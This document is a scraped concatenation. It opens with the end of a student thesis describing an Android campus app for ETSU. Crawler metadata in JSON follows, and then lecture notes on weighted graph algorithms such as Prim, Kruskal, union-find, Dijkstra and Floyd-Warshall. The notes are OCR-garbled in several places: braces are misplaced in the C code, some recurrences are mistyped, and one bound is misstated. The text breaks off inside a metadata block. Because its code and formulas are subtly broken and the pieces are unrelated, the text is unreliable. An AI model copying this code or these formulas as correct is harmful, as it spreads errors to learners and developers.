on both local and world news. Finally, the “Sports Schedule” button will take the user to another page to allow them to select from a list of sports teams and find which they wish to see the schedule of. Figure 5 shows this screen. ![Figure 5. This screen allows the user to select a Sport and then hit accept to navigate to the schedule of that team.](image) In addition to selecting and submitting, this screen (like other screens in the application) has a button that allows quick return to the home screen. Development of this section was fairly straightforward. The majority all of the content in this section is composed of simply linking the user on button presses to various external websites. I looked around on the internet for tutorials on how to fire an “Intent” (Android’s version of executing an action) to take the user to a particular webpage. After learning this, I put the code in place so that the “East Tennessean” and “Current Events” buttons would take the user to the intended place. The sports scheduling linking was a bit more of a challenge with needing to take the user to a particular place based on what they had selected from the drop-down menu. This was able to be done by looking at which value was currently selected in the drop-down menu when the user hit the submit button, and take them to the appropriate place based on that value. “Directions” Section Following completion of the “Entertainment” section, I elected to tackle what I thought would be one of the most challenging aspects of the project: the Directions section. I had planned on having integration with Google Maps for this part, but I had no idea how to integrate it or what the process would be to do so. Nevertheless, I dove headfirst into Google’s helpful tutorial on how to set up your own Google Maps application. This involves an in-depth process of registering your application with Google so that they can provide you with a key as well as a package of code to utilize in your application. This key is needed so that Google can track the tasks for which you are using your application’s GPS functions for. This way Google can know if someone’s application is using GPS functionality for malicious purposes. I fumbled around with this for a few days trying to understand how exactly implementing a map in my application should work. Fortunately, after browsing around online, I found many developers saying that implementation of the current version of Google Maps was not functional on the Android Emulators in Eclipse, but would actually work on a physical device. I decided to hook my own phone up and run my application on it to test this. Shockingly, it worked beautifully on my phone and it just seemed to be a problem with Google Maps and the emulators. After getting the basics down, I decided to present the user with a similar drop-down type list as the sports schedule section to select from an alphabetical list of key campus locations. This was not simply limited to buildings, but also included local hotspots, such as the Amphitheater. After selecting a location and hitting submit, the application will work with Google Maps to bring up walking directions from your current GPS-tracked location to whichever destination you chose. Figures 6 and 7 show this. ![Selection Screen](image) Figure 6. The selection screen for navigation to a particular location. Figure 7. The Google Maps navigation with walking directions from my current location to the ETSU Amphitheater In order to get these particular locations, I needed a way to tell Google Maps exactly where they are. Fortunately, there is a simple way to do this: GPS coordinates. By going on the online version of Google Maps, I was able to pinpoint all of these key locations on campus and attain the GPS coordinates of that place. I input this in the application and made it so that the application will navigate you from where you currently are to the GPS position of the selected place. This section ended up working fantastically well, much better than I anticipated. Currently, this section is the one I felt turned out the best. “Food” Section The last major section of the application is the “Food” section. At this point in time, this section is still under construction, but there are design documents/engineering specifications/etc. so this section can be completed in a future build. This section will produce a list of locations to the user of various restaurants, grocery stores, etc. that are relatively close by to ETSU’s campus. From this list, the user will be able to filter the places by “Type” (such as restaurants, stores, etc.), whether or not ID Bucs are accepted there, and place them in alphabetical order. In addition, the places will be able to be selected by the user to open up Google Maps to provide driving directions to these places in the same manner it is done for the campus locations. This will be done by having a database with all of the relevant information hosted on campus. The application will not connect directly to this database due to security concerns, but will instead go through a Web Service. Android can create what are essentially pseudo-web pages to allow a user to do various tasks. In this particular instance, a web service will be invoked that requests a connection to the database hosted on ETSU’s server. It will provide credentials to prove that it is from a trusted source and then pull whatever information is needed from the database. It will then finally pass this information back to the application which will display it as needed. Reflection Overall, this was an incredibly beneficial project to work on, and I learned an immense amount from developing this application. Specifically, looking back on my development process, there are a few things that I would certainly change. One major hiccup was the development of an official application by ETSU before I got a chance to get steadily into my own development. In the future if I intend to create anything official for a business of company, I will definitely be in more contact with them to avoid a situation such as this. Secondly, my application is only currently accessible on Android platforms. If I were to start this project all over again, I would definitely utilize certain tools that allow a developer to create an application that easily spans Android, iOS, and Windows Phones. All of these different functions come together in this application to create a product that is functional as well as useful for the average ETSU college student. My intentions for this application are for it to coincide with ETSU’s current official application and maybe even have the official one take some ideas from mine for it to improve. I plan to turn over ownership of the application to ETSU following graduation and give them permission to implement any of my ideas or functionality if they so desire. Works Cited
{"Source-Url": "http://dc.etsu.edu/cgi/viewcontent.cgi?article=1236&context=honors", "len_cl100k_base": 4500, "olmocr-version": "0.1.48", "pdf-total-pages": 20, "total-fallback-pages": 0, "total-input-tokens": 35112, "total-output-tokens": 5322, "length": "2e12", "weborganizer": {"__label__adult": 0.0009403228759765624, "__label__art_design": 0.00070953369140625, "__label__crime_law": 0.0004391670227050781, "__label__education_jobs": 0.01543426513671875, "__label__entertainment": 0.0001691579818725586, "__label__fashion_beauty": 0.0004177093505859375, "__label__finance_business": 0.0004680156707763672, "__label__food_dining": 0.000843048095703125, "__label__games": 0.0013446807861328125, "__label__hardware": 0.0020427703857421875, "__label__health": 0.0004944801330566406, "__label__history": 0.0006074905395507812, "__label__home_hobbies": 0.0002334117889404297, "__label__industrial": 0.0003981590270996094, "__label__literature": 0.0007624626159667969, "__label__politics": 0.0003299713134765625, "__label__religion": 0.00060272216796875, "__label__science_tech": 0.003200531005859375, "__label__social_life": 0.0004658699035644531, "__label__software": 0.005535125732421875, "__label__software_dev": 0.96240234375, "__label__sports_fitness": 0.000560760498046875, "__label__transportation": 0.0012426376342773438, "__label__travel": 0.0003077983856201172}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 23442, 0.01229]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 23442, 0.02349]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 23442, 0.9591]], "google_gemma-3-12b-it_contains_pii": [[0, 725, false], [725, 1048, null], [1048, 2656, null], [2656, 4354, null], [4354, 6147, null], [6147, 7361, null], [7361, 8687, null], [8687, 9462, null], [9462, 11451, null], [11451, 13404, null], [13404, 14657, null], [14657, 15559, null], [15559, 16463, null], [16463, 17193, null], [17193, 19143, null], [19143, 19739, null], [19739, 20322, null], [20322, 22135, null], [22135, 23264, null], [23264, 23442, null]], "google_gemma-3-12b-it_is_public_document": [[0, 725, true], [725, 1048, null], [1048, 2656, null], [2656, 4354, null], [4354, 6147, null], [6147, 7361, null], [7361, 8687, null], [8687, 9462, null], [9462, 11451, null], [11451, 13404, null], [13404, 14657, null], [14657, 15559, null], [15559, 16463, null], [16463, 17193, null], [17193, 19143, null], [19143, 19739, null], [19739, 20322, null], [20322, 22135, null], [22135, 23264, null], [23264, 23442, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 23442, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 23442, null]], "pdf_page_numbers": [[0, 725, 1], [725, 1048, 2], [1048, 2656, 3], [2656, 4354, 4], [4354, 6147, 5], [6147, 7361, 6], [7361, 8687, 7], [8687, 9462, 8], [9462, 11451, 9], [11451, 13404, 10], [13404, 14657, 11], [14657, 15559, 12], [15559, 16463, 13], [16463, 17193, 14], [17193, 19143, 15], [19143, 19739, 16], [19739, 20322, 17], [20322, 22135, 18], [22135, 23264, 19], [23264, 23442, 20]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 23442, 0.0]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
dc06ec925eee635a839e5a26e5f7c5f6366f6710
Weighted Graph Algorithms Beyond DFS/BFS exists an alternate universe of algorithms for *edge-weighted graphs*. Our adjacency list representation quietly supported these graphs: typedef struct { int y; int weight; struct edgenode *next; } edgenode; Minimum Spanning Trees A tree is a connected graph with no cycles. A spanning tree is a subgraph of $G$ which has the same set of vertices of $G$ and is a tree. A minimum spanning tree of a weighted graph $G$ is the spanning tree of $G$ whose edges sum to minimum weight. There can be more than one minimum spanning tree in a graph — consider a graph with identical weight edges. Why Minimum Spanning Trees? The minimum spanning tree problem has a long history – the first algorithm dates back at least to 1926!. Minimum spanning tree is always taught in algorithm courses since (1) it arises in many applications, (2) it is an important example where greedy algorithms always give the optimal answer, and (3) Clever data structures are necessary to make it work. In greedy algorithms, we make the decision of what next to do by selecting the best local option from all available choices – without regard to the global structure. Applications of Minimum Spanning Trees Minimum spanning trees are useful in constructing networks, by describing the way to connect a set of sites using the smallest total amount of wire. Minimum spanning trees provide a reasonable way for clustering points in space into natural groups. What are natural clusters in the friendship graph? One of the war stories in the text describes how to partition a graph into compact subgraphs by deleting large edges from the minimum spanning tree. Minimum Spanning Trees and TSP When the cities are points in the Euclidean plane, the minimum spanning tree provides a good heuristic for traveling salesman problems. The optimum traveling salesman tour is at most twice the length of the minimum spanning tree. Note: There can be more than one minimum spanning tree considered as a group with identical weight edges. Prim’s Algorithm If $G$ is connected, every vertex will appear in the minimum spanning tree. If not, we can talk about a minimum spanning forest. Prim’s algorithm starts from one vertex and grows the rest of the tree an edge at a time. As a greedy algorithm, which edge should we pick? The cheapest edge with which can grow the tree by one vertex without creating a cycle. Prim’s Algorithm (Pseudocode) During execution each vertex $v$ is either in the tree, *fringe* (meaning there exists an edge from a tree vertex to $v$) or *unseen* (meaning $v$ is more than one edge away). **Prim-MST(G)** - Select an arbitrary vertex $s$ to start the tree from. - While (there are still non-tree vertices) - Select the edge of minimum weight between a tree and a non-tree vertex. - Add the selected edge and vertex to the tree $T_{prim}$. This creates a spanning tree, since no cycle can be introduced, but is it minimum? Prim’s Algorithm in Action G A 7 9 4 2 3 7 12 5 7 4 1 A Prim(G,A) 1 2 6 4 3 5 A Kruskal(G) 6 2 1 3 4 5 Why is Prim Correct? We use a proof by contradiction: Suppose Prim’s algorithm does not always give the minimum cost spanning tree on some graph. If so, there is a graph on which it fails. And if so, there must be a first edge \((x, y)\) Prim adds such that the partial tree \(V'\) cannot be extended into a minimum spanning tree. But if $(x, y)$ is not in $MST(G)$, then there must be a path in $MST(G)$ from $x$ to $y$ since the tree is connected. Let $(v, w)$ be the first edge on this path with one edge in $V'$. Replacing it with $(x, y)$ we get a spanning tree with smaller weight, since $W(v, w) > W(x, y)$. Thus you did not have the MST!! Prim’s Algorithm is correct! Thus we cannot go wrong with the greedy strategy the way we could with the traveling salesman problem. How Fast is Prim’s Algorithm? That depends on what data structures are used. In the simplest implementation, we can simply mark each vertex as tree and non-tree and search always from scratch: Select an arbitrary vertex to start. While (there are non-tree vertices) select minimum weight edge between tree and fringe add the selected edge and vertex to the tree This can be done in $O(nm)$ time, by doing a DFS or BFS to loop through all edges, with a constant time test per edge, and a total of $n$ iterations. Prim’s Implementation To do it faster, we must identify fringe vertices and the minimum cost edge associated with it fast. ```c prim(graph *g, int start) { int i; (* counter *) edgenode *p; (* temporary pointer *) bool intree[MAXV]; (* is the vertex in the tree yet? *) int distance[MAXV]; (* distance vertex is from start *) int v; (* current vertex to process *) int w; (* candidate next vertex *) int weight; (* edge weight *) int dist; (* best current distance from start *) for (i=1; i<=g->nvertices; i++) { intree[i] = FALSE; distance[i] = MAXINT; parent[i] = -1; } distance[start] = 0; }``` v = start; while (intree[v] == FALSE) { intree[v] = TRUE; p = g -> edges[v]; while (p != NULL) { w = p -> y; weight = p -> weight; if ((distance[w] > weight) && (intree[w] == FALSE)) { distance[w] = weight; parent[w] = v; } p = p -> next; } } v = 1; dist = MAXINT; for (i=1; i<= g -> nvertices; i++) if ((intree[i] == FALSE) && (dist > distance[i])) { dist = distance[i]; v = i; } } Prim’s Analysis Finding the minimum weight fringe-edge takes $O(n)$ time – just bump through fringe list. After adding a vertex to the tree, running through its adjacency list to update the cost of adding fringe vertices (there may be a cheaper way through the new vertex) can be done in $O(n)$ time. Total time is $O(n^2)$. Kruskal’s Algorithm Since an easy lower bound argument shows that every edge must be looked at to find the minimum spanning tree, and the number of edges $m = O(n^2)$, Prim’s algorithm is optimal in the worst case. Is that all she wrote? The complexity of Prim’s algorithm is independent of the number of edges. Can we do better with sparse graphs? Yes! Kruskal’s algorithm is also greedy. It repeatedly adds the smallest edge to the spanning tree that does not create a cycle. Kruskal’s Algorithm in Action Why is Kruskal’s algorithm correct? Again, we use proof by contradiction. Suppose Kruskal’s algorithm does not always give the minimum cost spanning tree on some graph. If so, there is a graph on which it fails. And if so, there must be a first edge \((x, y)\) Kruskal adds such that the set of edges cannot be extended into a minimum spanning tree. When we added \((x, y)\) there previously was no path between \(x\) and \(y\), or it would have created a cycle. Thus if we add \((x, y)\) to the optimal tree it must create a cycle. At least one edge in this cycle must have been added after \((x, y)\), so it must have a heavier weight. Deleting this heavy edge leave a better MST than the optimal tree? A contradiction! How fast is Kruskal’s algorithm? What is the simplest implementation? - Sort the $m$ edges in $O(m \lg m)$ time. - For each edge in order, test whether it creates a cycle the forest we have thus far built – if so discard, else add to forest. With a BFS/DFS, this can be done in $O(n)$ time (since the tree has at most $n$ edges). The total time is $O(mn)$, but can we do better? Fast Component Tests Give Fast MST Kruskal’s algorithm builds up connected components. Any edge where both vertices are in the same connected component create a cycle. Thus if we can maintain which vertices are in which component fast, we do not have test for cycles! - **Same component**\((v_1, v_2)\) – Do vertices \(v_1\) and \(v_2\) lie in the same connected component of the current graph? - **Merge components**\((C_1, C_2)\) – Merge the given pair of connected components into one component. Fast Kruskal Implementation Put the edges in a heap \[ \text{count} = 0 \] while (\text{count} < n - 1) do get next edge \((v, w)\) if (\text{component}(v) \neq \text{component}(w)) add to T \text{component}(v) = \text{component}(w) If we can test components in \(O(\log n)\), we can find the MST in \(O(m \log m)\)! Question: Is \(O(m \log n)\) better than \(O(m \log m)\)? Union-Find Programs We need a data structure for maintaining sets which can test if two elements are in the same and merge two sets together. These can be implemented by \textit{union} and \textit{find} operations, where - \textit{Find}(i) – Return the label of the root of tree containing element \textit{i}, by walking up the parent pointers until there is no where to go. - \textit{Union}(i,j) – Link the root of one of the trees (say containing \textit{i}) to the root of the tree containing the other (say \textit{j}) so \textit{find}(i) now equals \textit{find}(j). Same Component Test \[ \text{Is } s_i \equiv s_j \] \[ t = \text{Find}(s_i) \] \[ u = \text{Find}(s_j) \] Return (Is \( t = u \)?) **Merge Components Operation** Make $s_i \equiv s_j$ \[ t = d(s_i) \] \[ u = d(s_j) \] Union($t, u$) We are interested in minimizing the time it takes to execute any sequence of unions and finds. A simple implementation is to represent each set as a tree, with pointers from a node to its parent. Each element is contained in a node, and the name of the set is the key at the root: Worst Case for Union Find In the worst case, these structures can be very unbalanced: For $i = 1$ to $n/2$ do UNION($i$, $i+1$) For $i = 1$ to $n/2$ do FIND(1) Who’s The Daddy? We want the limit the height of our trees which are effected by union’s. When we union, we can make the tree with fewer nodes the child. Since the number of nodes is related to the height, the height of the final tree will increase only if both subtrees are of equal height! If $\text{Union}(t, v)$ attaches the root of $v$ as a subtree of $t$ iff the number of nodes in $t$ is greater than or equal to the number in $v$, after any sequence of unions, any tree with $h/4$ nodes has height at most $\lceil \lg h \rceil$. Proof By induction on the number of nodes $k$, $k = 1$ has height 0. Let $d_i$ be the height of the tree $t_i$ If $(d_1 > d_2)$ then $d = d_1 \leq \lceil \log k_1 \rceil \leq \lceil \log(k_1 + k_2) \rceil = \lceil \log k \rceil$ If $(d_1 \leq d_2)$, then $k_1 \geq k_2$. $d = d_2 + 1 \leq \lceil \log k_2 \rceil + 1 = \lceil \log 2k_2 \rceil \leq \lceil \log(k_1 + k_2) \rceil = \log k$ Can we do better? We can do unions and finds in $O(\log n)$, good enough for Kruskal’s algorithm. But can we do better? The ideal Union-Find tree has depth 1: On a find, if we are going down a path anyway, why not change the pointers to point to the root? This path compression will let us do better than $O(n \log n)$ for $n$ union-finds. $O(n)$? Not quite … Difficult analysis shows that it takes $O(n \alpha(n))$ time, where $\alpha(n)$ is the inverse Ackerman function and $\alpha($number of atoms in the universe$)= 5.$ Problem of the Day Suppose we are given the minimum spanning tree $T$ of a given graph $G$ (with $n$ vertices and $m$ edges) and a new edge $e = (u, v)$ of weight $w$ that we will add to $G$. Give an efficient algorithm to find the minimum spanning tree of the graph $G + e$. Your algorithm should run in $O(n)$ time to receive full credit, although slower but correct algorithms will receive partial credit. Finding the shortest path between two nodes in a graph arises in many different applications: - Transportation problems – finding the cheapest way to travel between two locations. - Motion planning – what is the most natural way for a cartoon character to move about a simulated environment. - Communications problems – how long will it take for a message to get between two places? Which two locations are furthest apart, i.e., what is the diameter of the network. Shortest Paths and Sentence Disambiguation In our work on reconstructing text typed on an (overloaded) telephone keypad, we had to select which of many possible interpretations was most likely. We constructed a graph where the vertices were the possible words/positions in the sentence, with an edge between possible neighboring words. GIVE ME A RING. The weight of each edge is a function of the probability that these two words will be next to each other in a sentence. ‘hive me’ would be less than ‘give me’, for example. The final system worked extremely well – identifying over 99% of characters correctly based on grammatical and statistical constraints. Dynamic programming (the Viterbi algorithm) can be used on the sentences to obtain the same results, by finding the shortest paths in the underlying DAG. Shortest Paths: Unweighted Graphs In an unweighted graph, the cost of a path is just the number of edges on the shortest path, which can be found in $O(n+m)$ time via breadth-first search. In a weighted graph, the weight of a path between two vertices is the sum of the weights of the edges on a path. BFS will not work on weighted graphs because sometimes visiting more edges can lead to shorter distance, i.e., $1 + 1 + 1 + 1 + 1 + 1 + 1 + 1 < 10$. Note that there can be an exponential number of shortest paths between two nodes – so we cannot report all shortest paths efficiently. Negative Edge Weights Note that negative cost cycles render the problem of finding the shortest path meaningless, since you can always loop around the negative cost cycle more to reduce the cost of the path. Thus in our discussions, we will assume that all edge weights are positive. Other algorithms deal correctly with negative cost edges. Minimum spanning trees are uneffected by negative cost edges. Dijkstra’s Algorithm The principle behind Dijkstra’s algorithm is that if \( s, \ldots, x, \ldots, t \) is the shortest path from \( s \) to \( t \), then \( s, \ldots, x \) had better be the shortest path from \( s \) to \( x \). This suggests a dynamic programming-like strategy, where we store the distance from \( s \) to all nearby nodes, and use them to find the shortest path to more distant nodes. Initialization and Update The shortest path from $s$ to $s$, $d(s, s) = 0$. If all edge weights are positive, the *smallest* edge incident to $s$, say $(s, x)$, defines $d(s, x)$. We can use an array to store the length of the shortest path to each node. Initialize each to $\infty$ to start. Soon as we establish the shortest path from $s$ to a new node $x$, we go through each of its incident edges to see if there is a better way from $s$ to other nodes thru $x$. Pseudocode: Dijkstra’s Algorithm \[ \begin{align*} \text{known} & = \{s\} \\ \text{for } i = 1 \text{ to } n, \quad \text{dist}[i] & = \infty \\ \text{for each edge } (s, v), \quad \text{dist}[v] & = d(s, v) \\ \text{last} & = s \\ \text{while } (\text{last} \neq t) \\ & \quad \text{select } v \text{ such that } \text{dist}(v) = \min_{\text{unknown}} \text{dist}(i) \\ & \quad \text{for each } (v, x), \quad \text{dist}[x] = \min(\text{dist}[x], \text{dist}[v] + w(v, x)) \\ & \quad \text{last} = v \\ \text{known} & = \text{known} \cup \{v\} \end{align*} \] Complexity \( \rightarrow O(n^2) \). This is essentially the same as Prim’s algorithm. Dijkstra Example Dijkstra’s Implementation See how little changes from Prim’s algorithm! ```c void dijkstra(graph *g, int start) (* WAS prim(g,start) *) { int i; (* counter *) edgenode *p; (* temporary pointer *) bool intree[MAXV]; (* is the vertex in the tree yet? *) int distance[MAXV]; (* distance vertex is from start *) int v; (* current vertex to process *) int w; (* candidate next vertex *) int weight; (* edge weight *) int dist; (* best current distance from start *) for (i=1; i<=g->nvertices; i++) { intree[i] = FALSE; distance[i] = MAXINT; parent[i] = -1; } distance[start] = 0; v = start; ``` while (intree[v] == FALSE) { intree[v] = TRUE; p = g->edges[v]; while (p != NULL) { w = p->y; weight = p->weight; (* CHANGED *) if (distance[w] > (distance[v]+weight)) { (* CHANGED *) distance[w] = distance[v]+weight; (* CHANGED *) parent[w] = v; } p = p->next; } v = 1; dist = MAXINT; for (i=1; i <= g->nvertices; i++) if (((intree[i] == FALSE) && (dist > distance[i]))) { dist = distance[i]; v = i; } } } Prim’s/Dijkstra’s Analysis Finding the minimum weight fringe-edge takes $O(n)$ time – just bump through fringe list. After adding a vertex to the tree, running through its adjacency list to update the cost of adding fringe vertices (there may be a cheaper way through the new vertex) can be done in $O(n)$ time. Total time is $O(n^2)$. Improved Time Bounds An $O(m \lg n)$ implementation of Dijkstra’s algorithm would be faster for sparse graphs, and comes from using a heap of the vertices (ordered by distance), and updating the distance to each vertex (if necessary) in $O(\lg n)$ time for each edge out from freshly known vertices. Even better, $O(n \lg n + m)$ follows from using Fibonacci heaps, since they permit one to do a decrease-key operation in $O(1)$ amortized time. All-Pairs Shortest Path Notice that finding the shortest path between a pair of vertices \((s, t)\) in worst case requires first finding the shortest path from \(s\) to all other vertices in the graph. Many applications, such as finding the center or diameter of a graph, require finding the shortest path between all pairs of vertices. We can run Dijkstra’s algorithm \(n\) times (once from each possible start vertex) to solve all-pairs shortest path problem in \(O(n^3)\). Can we do better? Dynamic Programming and Shortest Paths The four-step approach to dynamic programming is: 1. Characterize the structure of an optimal solution. 2. Recursively define the value of an optimal solution. 3. Compute this recurrence in a bottom-up fashion. 4. Extract the optimal solution from computed information. Initialization From the adjacency matrix, we can construct the following matrix: \[ D[i, j] = \begin{cases} \infty, & \text{if } i \neq j \text{ and } (v_i, v_j) \text{ is not in } E \\ \omega(i, j), & \text{if } (v_i, v_j) \in E \\ 0, & \text{if } i = j \end{cases} \] This tells us the shortest path going through no intermediate nodes. There are several ways to characterize the shortest path between two nodes in a graph. Note that the shortest path from \( i \) to \( j \), \( i \neq j \), using at most \( M \) edges consists of the shortest path from \( i \) to \( k \) using at most \( M - 1 \) edges plus \( W(k, j) \) for some \( k \). This suggests that we can compute all-pair shortest path with an induction based on the number of edges in the optimal path. Recurrence on Path Length Let $d[i, j]^m$ be the length of the shortest path from $i$ to $j$ using at most $m$ edges. What is $d[i, j]^0$? $$d[i, j]^0 = \begin{cases} 0 & \text{if } i = j \\ \infty & \text{if } i \neq j \end{cases}$$ What if we know $d[i, j]^{m-1}$ for all $i, j$? $$d[i, j]^m = \min(d[i, j]^{m-1}, \min(d[i, k]^{m-1} + w[k, j]))$$ $$= \min(d[i, k]^{m-1} + w[k, j]), 1 \leq k \leq i$$ since $w[k, k] = 0$ Not Floyd Implementation This gives us a recurrence, which we can evaluate in a bottom up fashion: \[ \text{for } i = 1 \text{ to } n \\ \quad \text{for } j = 1 \text{ to } n \\ \quad d[i, j]^m = \infty \\ \quad \text{for } k = 1 \text{ to } n \\ \quad \quad d[i, j]_0^0 = \min( d[i, k]^m, d[i, k]^{m-1} + d[k, j] ) \] Time Analysis – Bummer This is an $O(n^3)$ algorithm just like matrix multiplication, but it only goes from $m$ to $m + 1$ edges. Since the shortest path between any two nodes must use at most $n$ edges (unless we have negative cost cycles), we must repeat that procedure $n$ times ($m = 1$ to $n$) for an $O(n^4)$ algorithm. Although this is slick, observe that even $O(n^3 \log n)$ is slower than running Dijkstra’s algorithm starting from each vertex! The Floyd-Warshall Algorithm An alternate recurrence yields a more efficient dynamic programming formulation. Number the vertices from 1 to \( n \). Let \( d[i, j]^k \) be the shortest path from \( i \) to \( j \) using only vertices from 1, 2, ..., \( k \) as possible intermediate vertices. What is \( d[j, j]^0 \)? With no intermediate vertices, any path consists of at most one edge, so \( d[i, j]^0 = w[i, j] \). Recurrence Relation In general, adding a new vertex $k + 1$ helps iff a path goes through it, so $$d[i, j]^k = w[i, j] \text{ if } k = 0$$ $$= \min(d[i, j]^{k-1}, d[i, k]^{k-1} + d[k, j]^{k-1}) \text{ if } k \geq 1$$ Although this looks similar to the previous recurrence, it isn’t. Implementation The following algorithm implements it: \[ d^0 = w \] for \( k = 1 \) to \( n \) for \( i = 1 \) to \( n \) for \( j = 1 \) to \( n \) \[ d[i, j]^k = \min(d[i, j]^{k-1}, d[i, k]^{k-1} + d[k, j]^{k-1}) \] This obviously runs in \( \Theta(n^3) \) time, which is asymptotically no better than \( n \) calls to Dijkstra’s algorithm. However, the loops are so tight and it is so short and simple that it runs better in practice by a constant factor. Problem of the Day The *single-destination shortest path* problem for a directed graph is to find the shortest path *from* every vertex to a specified vertex $v$. Give an efficient algorithm to solve the single-destination shortest paths problem. Problem of the Day Let $G$ be a weighted directed graph with $n$ vertices and $m$ edges, where all edges have positive weight. A directed cycle is a directed path that starts and ends at the same vertex and contains at least one edge. Give an $O(n^3)$ algorithm to find a directed cycle in $G$ of minimum total weight. Partial credit will be given for an $O(n^2m)$ algorithm.
{"Source-Url": "http://homepage.cs.uiowa.edu/~hzhang/c31/notes/ch06WGraph.pdf", "len_cl100k_base": 5994, "olmocr-version": "0.1.53", "pdf-total-pages": 62, "total-fallback-pages": 0, "total-input-tokens": 90348, "total-output-tokens": 8424, "length": "2e12", "weborganizer": {"__label__adult": 0.0006170272827148438, "__label__art_design": 0.0003781318664550781, "__label__crime_law": 0.00075531005859375, "__label__education_jobs": 0.000812530517578125, "__label__entertainment": 0.0001480579376220703, "__label__fashion_beauty": 0.00027632713317871094, "__label__finance_business": 0.00024187564849853516, "__label__food_dining": 0.0008463859558105469, "__label__games": 0.0018472671508789065, "__label__hardware": 0.002147674560546875, "__label__health": 0.001495361328125, "__label__history": 0.0005125999450683594, "__label__home_hobbies": 0.0002160072326660156, "__label__industrial": 0.0007224082946777344, "__label__literature": 0.000507354736328125, "__label__politics": 0.0003952980041503906, "__label__religion": 0.0009398460388183594, "__label__science_tech": 0.091064453125, "__label__social_life": 0.0001347064971923828, "__label__software": 0.00516510009765625, "__label__software_dev": 0.8876953125, "__label__sports_fitness": 0.0008835792541503906, "__label__transportation": 0.0017557144165039062, "__label__travel": 0.0004014968872070313}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21925, 0.02787]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21925, 0.66565]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21925, 0.87379]], "google_gemma-3-12b-it_contains_pii": [[0, 263, false], [263, 645, null], [645, 645, null], [645, 1197, null], [1197, 1537, null], [1537, 1686, null], [1686, 2055, null], [2055, 2431, null], [2431, 2978, null], [2978, 3096, null], [3096, 3428, null], [3428, 3744, null], [3744, 3877, null], [3877, 4400, null], [4400, 5070, null], [5070, 5559, null], [5559, 5886, null], [5886, 6365, null], [6365, 6395, null], [6395, 7034, null], [7034, 7118, null], [7118, 7500, null], [7500, 8001, null], [8001, 8393, null], [8393, 8968, null], [8968, 9101, null], [9101, 9206, null], [9206, 9487, null], [9487, 9654, null], [9654, 9940, null], [9940, 10194, null], [10194, 10585, null], [10585, 10843, null], [10843, 11113, null], [11113, 11523, null], [11523, 11990, null], [11990, 12327, null], [12327, 12343, null], [12343, 12653, null], [12653, 12807, null], [12807, 13396, null], [13396, 13801, null], [13801, 14209, null], [14209, 14679, null], [14679, 15330, null], [15330, 15347, null], [15347, 16013, null], [16013, 16552, null], [16552, 16890, null], [16890, 17337, null], [17337, 17833, null], [17833, 18144, null], [18144, 18488, null], [18488, 18921, null], [18921, 19350, null], [19350, 19671, null], [19671, 20127, null], [20127, 20548, null], [20548, 20835, null], [20835, 21301, null], [21301, 21549, null], [21549, 21925, null]], "google_gemma-3-12b-it_is_public_document": [[0, 263, true], [263, 645, null], [645, 645, null], [645, 1197, null], [1197, 1537, null], [1537, 1686, null], [1686, 2055, null], [2055, 2431, null], [2431, 2978, null], [2978, 3096, null], [3096, 3428, null], [3428, 3744, null], [3744, 3877, null], [3877, 4400, null], [4400, 5070, null], [5070, 5559, null], [5559, 5886, null], [5886, 6365, null], [6365, 6395, null], [6395, 7034, null], [7034, 7118, null], [7118, 7500, null], [7500, 8001, null], [8001, 8393, null], [8393, 8968, null], [8968, 9101, null], [9101, 9206, null], [9206, 9487, null], [9487, 9654, null], [9654, 9940, null], [9940, 10194, null], [10194, 10585, null], [10585, 10843, null], [10843, 11113, null], [11113, 11523, null], [11523, 11990, null], [11990, 12327, null], [12327, 12343, null], [12343, 12653, null], [12653, 12807, null], [12807, 13396, null], [13396, 13801, null], [13801, 14209, null], [14209, 14679, null], [14679, 15330, null], [15330, 15347, null], [15347, 16013, null], [16013, 16552, null], [16552, 16890, null], [16890, 17337, null], [17337, 17833, null], [17833, 18144, null], [18144, 18488, null], [18488, 18921, null], [18921, 19350, null], [19350, 19671, null], [19671, 20127, null], [20127, 20548, null], [20548, 20835, null], [20835, 21301, null], [21301, 21549, null], [21549, 21925, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, true], [5000, 21925, null]], "pdf_page_numbers": [[0, 263, 